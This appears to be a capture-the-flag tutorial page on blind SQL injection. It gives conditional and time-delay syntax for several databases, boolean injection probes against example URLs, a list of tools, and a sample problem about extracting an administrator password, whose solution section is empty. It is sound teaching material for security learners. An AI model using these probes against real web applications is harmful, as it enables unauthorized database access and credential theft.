Blind Injections
Introduction
Blind SQL Injection is a type of SQL injection attack where the attacker cannot see the result of the query directly. Instead, they infer information from the application's behavior, such as differences in response times or error messages. This method is useful when error messages are not displayed, but the application still processes the injected SQL commands. Sadly blind injection challenges are generally harder than normal SQLi question, but that doesn't mean you can't solve it :)
Table of Contents
How to identify
To identify Blind SQL Injection vulnerabilities, pay attention to subtle differences in application responses. Indicators include:
Behavior Testing: Entering SQL syntax that does not produce visible errors but causes changes in application behavior, such as differences in response times or content.
Boolean-based Testing: Using boolean conditions (true/false) to determine the existence of a vulnerability.
If Statements: This is one of the key techniques for Blind SQL Injection. Also very useful to test simpler things blindly yet accurately. The syntax is slightly different based on the database used.
MySQL If Statement
IF(condition,true-part,false-part) SELECT IF(1=1,'true','false')
SQL Server If Statement
IF condition true-part ELSE false-part IF (1=1) SELECT 'true' ELSE SELECT 'false'
Oracle If Statement
IF condition THEN true-part; ELSE false-part; END IF; IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF;
PostgreSQL If Statement
SELECT CASE WHEN condition THEN true-part ELSE false-part END; SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END;
SQLite If Statement
if(condition, true-part, false-part) SELECT iif(1<2, "True", "False");
Time-based Testing: Using time delays (e.g.,
SLEEP
function) to measure response times and infer database information. (More on this in here)
Example:
http://example.com/item.php?id=1 AND 1=1 -- (Normal response)
http://example.com/item.php?id=1 AND 1=2 -- (Different response)
or maybe a form
Product ID: A97HY (Normal response)
Product ID: true -- (Different response)
Code/tools/websites
Tools
SQLMap: An automated tool for SQL injection and database takeover.
Burp Suite: A web vulnerability scanner with tools for manual testing.
Havij: An automated SQL injection tool.
Websites
https://ctflearn.com/challenge/430 [Quite hard]
Hint: First use auth by-pass then start applying blind SQL.
Sample problem
Problem Statement
You are provided with a web application that uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.
The application includes a "Welcome back" message in the page if the query returns any rows.
The database contains a different table called users
, with columns called username
and password
.
Identify if the application is vulnerable to Blind SQL Injection and find out the password of the administrator user.
Solution
References
Conclusion
Blind SQL Injection exploits differences in application behavior to infer database information without directly viewing the results. Identifying and exploiting these vulnerabilities requires careful observation and systematic testing.
Last updated